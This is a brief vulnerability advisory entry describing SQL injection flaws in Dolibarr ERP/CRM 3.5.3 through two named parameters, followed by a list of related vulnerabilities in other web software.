Description
Multiple SQL injection vulnerabilities in Dolibarr ERP/CRM 3.5.3 allow remote authenticated users to execute arbitrary SQL commands via the (1) entity parameter in an update action to user/fiche.php or (2) sortorder parameter to user/group/index.php.
Remediation
References
Related Vulnerabilities
Drupal Core 9.1.x Directory Traversal (9.1.0 - 9.1.10)
Elgg URL Redirection to Untrusted Site ('Open Redirect') Vulnerability (CVE-2019-11016)
WordPress 4.1.x Multiple Vulnerabilities (4.1 - 4.1.39)
WordPress Plugin Groundhogg-Marketing Automation & CRM for WordPress SQL Injection (1.3.11.13)
XWiki Improper Control of Generation of Code ('Code Injection') Vulnerability (CVE-2023-29210)